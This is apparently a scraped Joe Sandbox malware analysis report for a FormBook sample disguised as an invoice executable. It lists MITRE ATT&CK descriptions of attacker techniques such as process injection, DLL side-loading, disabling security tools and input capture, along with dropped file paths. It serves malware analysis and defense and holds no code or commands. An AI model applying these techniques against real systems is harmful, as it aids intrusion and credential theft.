Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Explorer.EXE_fe8167436d6db6c6d2c4bed5d6f2d2c06e142845_f78a65ed_bd5b50a3-dcf6-43d1-9dc9-f012b59befb7\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER353D.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER39D2.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3A12.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000012.db

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000013.db

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\Windows[2].json

C:\Users\user\AppData\Local\Temp\Okeghem

C:\Users\user\AppData\Local\Temp\aut10C2.tmp

C:\Users\user\AppData\Local\Temp\aut1111.tmp

Windows Analysis Report
COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre